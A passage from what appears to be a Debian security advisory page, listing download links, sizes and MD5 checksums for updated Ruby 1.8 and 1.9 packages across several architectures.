nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_amd64.deb</a>\r\nSize/MD5 checksum: 1584216 69ed7f6bca37c0c549bf528f773e2900\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_amd64.deb</a>\r\nSize/MD5 checksum: 323450 5baea37cc897959fc20d48ac89de0d74\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_amd64.deb</a>\r\nSize/MD5 checksum: 345864 c39d9b07d0cb6e4099ca3efeafb5fa6e\r\n\r\narm architecture (ARM)\r\n\r\n<a 
href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_arm.deb</a>\r\nSize/MD5 checksum: 1526984 0e6ab8221858243c7145bbc41ecb4e8f\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_arm.deb</a>\r\nSize/MD5 checksum: 365056 66c7f98e2bb319a62ee7c4c92672c731\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_arm.deb</a>\r\nSize/MD5 checksum: 196710 9e8c6e4cb718dc719e8fde6b26f962e4\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_arm.deb</a>\r\nSize/MD5 checksum: 991516 14a9b5cbf719d62dc8353a51afb555a9\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_arm.deb</a>\r\nSize/MD5 checksum: 1859122 e0c7c1e7d2ccf0e49bce45e7e7bf1278\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_arm.deb</a>\r\nSize/MD5 checksum: 1792772 d56d498189d5406b5020d9d924117e7c\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_arm.deb target=_blank rel=external 
nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_arm.deb</a>\r\nSize/MD5 checksum: 197418 d26ec8fb413c9ebab080bedea93722b1\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_arm.deb</a>\r\nSize/MD5 checksum: 197808 a36c730da4bcea2d72f5d370322eb30f\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_arm.deb</a>\r\nSize/MD5 checksum: 792994 579ec1a30cd9a1cbd8bf67aa06dc4d24\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_arm.deb</a>\r\nSize/MD5 checksum: 697246 ca45d9a326d51f5434d1621abcece266\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_arm.deb</a>\r\nSize/MD5 checksum: 216240 423493a419191c35b8b3e80a1f1f1c9c\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_arm.deb</a>\r\nSize/MD5 checksum: 216324 a266f8778f5e7d613db6ba3f15adb763\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_arm.deb</a>\r\nSize/MD5 checksum: 237202 
5fc7e98291401cd3fe917ed05d9bd015\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_arm.deb</a>\r\nSize/MD5 checksum: 287576 eced197b837fe4d62c03b20bed6815be\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_arm.deb</a>\r\nSize/MD5 checksum: 1876264 bc351c3337a5d5987f6ddb836768922e\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_arm.deb</a>\r\nSize/MD5 checksum: 219386 3f0b1eb14311c982d63ebd0fab64f5f4\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_arm.deb</a>\r\nSize/MD5 checksum: 215572 2c0ccc988ac6ea3250f8dc367ccaa2a2\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_arm.deb</a>\r\nSize/MD5 checksum: 311564 8dfe07d2f7dcf8275e8ad8f41dcda0c0\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_hppa.deb</a>\r\nSize/MD5 checksum: 218160 513b9ae768f77d80a13fa851e1c8f4f7\r\n<a 
href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_hppa.deb</a>\r\nSize/MD5 checksum: 824152 6146a8f873531c0ed8cf0d06d2e17d2c\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_hppa.deb</a>\r\nSize/MD5 checksum: 395602 6cc76b78245992c6a68b9e078ae89d53\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_hppa.deb</a>\r\nSize/MD5 checksum: 199900 d70a4e3bc2ced6217727543e7fe0f9b0\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_hppa.deb</a>\r\nSize/MD5 checksum: 316214 4e6641aa45421ffab8b99ab8a9e8d16a\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_hppa.deb</a>\r\nSize/MD5 checksum: 217620 85109a63b0b20068f6320cda8f3ec6ad\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_hppa.deb</a>\r\nSize/MD5 checksum: 237090 a3d1415f5a1ad8238d56b050975189e9\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_hppa.deb target=_blank rel=external 
nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_hppa.deb</a>\r\nSize/MD5 checksum: 200304 783f82fe9eac7aa259a35479cc2a47e7\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_hppa.deb</a>\r\nSize/MD5 checksum: 1880858 9ab71d7b85b97c1f2d2aa3500b9ce7c1\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_hppa.deb</a>\r\nSize/MD5 checksum: 1040322 02afc219d2b174b059881ec0a83356fc\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_hppa.deb</a>\r\nSize/MD5 checksum: 1861536 432efb1fffc5c2b1d9cc7b74ae7baa39\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_hppa.deb</a>\r\nSize/MD5 checksum: 199202 84de055812481012c4876c17833ce3b0\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_hppa.deb</a>\r\nSize/MD5 checksum: 1869258 834f2dbf84ab6697d7980d3658290cfd\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_hppa.deb</a>\r\nSize/MD5 checksum: 219214 801a3641d72145d568a6c0c88ef43bd8\r\n<a 
href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_hppa.deb</a>\r\nSize/MD5 checksum: 888950 464ded03bf97abbc0d417b089fa87d60\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_hppa.deb</a>\r\nSize/MD5 checksum: 217980 2535726a60b609b1a55fc310328df532\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_hppa.deb</a>\r\nSize/MD5 checksum: 1677084 d5b606c636b8cd27143ce002d0ed2ce9\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_hppa.deb</a>\r\nSize/MD5 checksum: 333772 38a4c8fef89fde902a0be85e59fe8a8f\r\n\r\ni386 architecture (Intel ia32)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_i386.deb</a>\r\nSize/MD5 checksum: 197974 e282a6d8268ef83c156a860fb8a16a7c\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_i386.deb</a>\r\nSize/MD5 checksum: 216404 82cf3992d705f2e9b88a915e352ca934\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_i386.deb 
target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_i386.deb</a>\r\nSize/MD5 checksum: 1530904 7f21db178c88933c5e077890402de73f\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_i386.deb</a>\r\nSize/MD5 checksum: 1752738 3291630941e3dbb88efb8a97f33c208b\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_i386.deb</a>\r\nSize/MD5 checksum: 217116 6d9fbeeb9354b35e033f036109c3187c\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_i386.deb</a>\r\nSize/MD5 checksum: 216638 513608a225ce87330453e9b1bd910f34\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_i386.deb</a>\r\nSize/MD5 checksum: 1001838 64e08e52fac509f2bcdec25fed6fdc07\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_i386.deb</a>\r\nSize/MD5 checksum: 719438 d568135366f021f1511e186201475268\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_i386.deb</a>\r\nSize/MD5 checksum: 197348 8fec8e658d39d42c2857475ef279f08d\r\n<a 
href=http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_i386.deb</a>\r\nSize/MD5 checksum: 290114 69d7bdf1893fe305a003fbcaf264c9e4\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_i386.deb</a>\r\nSize/MD5 checksum: 1821730 a79338c8bfea54d6c6e78f85fb0aaa4d\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_i386.deb</a>\r\nSize/MD5 checksum: 1867788 9258d6168a057238d5dd1ead02513e74\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_i386.deb</a>\r\nSize/MD5 checksum: 758004 40c77b36b3a2b061db9c16b4a01f4391\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_i386.deb</a>\r\nSize/MD5 checksum: 237546 2e1c1a544086d57780f3ae4bb02da9c0\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_i386.deb</a>\r\nSize/MD5 checksum: 345762 cb32b33017f36b17cc06cc8ed90414b9\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_i386.deb target=_blank rel=external 
nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_i386.deb</a>\r\nSize/MD5 checksum: 309632 3202e1f7f3c9eb0b6062148b9af7e788\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_i386.deb</a>\r\nSize/MD5 checksum: 215662 1cd102a588e1082716a0858dbc5891d0\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_i386.deb</a>\r\nSize/MD5 checksum: 197442 c38974894410e79acf7931fc0e8dad54\r\n\r\nia64 architecture (Intel ia64)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_ia64.deb</a>\r\nSize/MD5 checksum: 330612 0887a43e2d62199cc73660039d7f1919\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_ia64.deb</a>\r\nSize/MD5 checksum: 351174 1bb59b9997961359cb20c9fb6945a0f0\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_ia64.deb</a>\r\nSize/MD5 checksum: 351444 5918b0c479ee79cc7466484c76e6dd98\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_ia64.deb target=_blank rel=external 
nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_ia64.deb</a>\r\nSize/MD5 checksum: 2225792 c780194abaeac68b844bc6fcd411376d\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_ia64.deb</a>\r\nSize/MD5 checksum: 971834 e280240763deda9e120b41faf64b47e2\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_ia64.deb</a>\r\nSize/MD5 checksum: 203432 7430326aeac7519e33b7ca34a77c1779\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_ia64.deb</a>\r\nSize/MD5 checksum: 220188 1b368e296ab170d1e005f600cada244f\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_ia64.deb</a>\r\nSize/MD5 checksum: 1864142 76176efd4132f6dd862946935368e2d6\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_ia64.deb</a>\r\nSize/MD5 checksum: 218646 4c1088b7f7002d3223ca0a33e27eaa0e\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_ia64.deb</a>\r\nSize/MD5 checksum: 1095818 
64f6c9fd95b4c6af5cdfade1b958e9c8\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_ia64.deb</a>\r\nSize/MD5 checksum: 236376 d8ffa9e36d27c315bf12543035067d4b\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_ia64.deb</a>\r\nSize/MD5 checksum: 220668 62f25d6880a721afac92d5fbd08ee714\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_ia64.deb</a>\r\nSize/MD5 checksum: 202476 a5d3f5c7b7c963ecd5ab916315deb460\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_ia64.deb</a>\r\nSize/MD5 checksum: 1024524 c406606563dae3bf9ad255a4c0c8344f\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_ia64.deb</a>\r\nSize/MD5 checksum: 1895844 ea86b262fda8dc1dee04a1348abffbca\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_ia64.deb</a>\r\nSize/MD5 checksum: 201506 22ba7b847e836fd960b0cb53358c106b\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_ia64.deb target=_blank rel=external 
nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_ia64.deb</a>\r\nSize/MD5 checksum: 220662 6f066d4dbe40ba488e1ae2e883dc6262\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_ia64.deb</a>\r\nSize/MD5 checksum: 1861880 e3b9fcda55d44a6b921140fc49cdbecc\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_mips.deb</a>\r\nSize/MD5 checksum: 215262 4d2fe03f92af44b8362661b562b21754\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_mips.deb</a>\r\nSize/MD5 checksum: 1084552 2d2dac8ed50123fdb90d733e9cf9b855\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_mips.deb</a>\r\nSize/MD5 checksum: 1862110 3b49c520a4ce20c6d6fcc11319a182e1\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_mips.deb</a>\r\nSize/MD5 checksum: 1680280 bf7a624e97e372c4bbfc2fe769ff8974\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_mips.deb target=_blank rel=external 
nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_mips.deb</a>\r\nSize/MD5 checksum: 197456 8c980f163be8105285609fdd454e1977\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_mips.deb</a>\r\nSize/MD5 checksum: 236198 81b996367fc453a8ceb3a531501253de\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_mips.deb</a>\r\nSize/MD5 checksum: 301628 bb1dc6aa3461335e4a9b419cd267ee65\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_mips.deb</a>\r\nSize/MD5 checksum: 874228 a5cc44dbd1cc80f8eef1a159ab3189f3\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_mips.deb</a>\r\nSize/MD5 checksum: 216100 f2360af30afc204b9226bf5cc0863853\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_mips.deb target=_blank 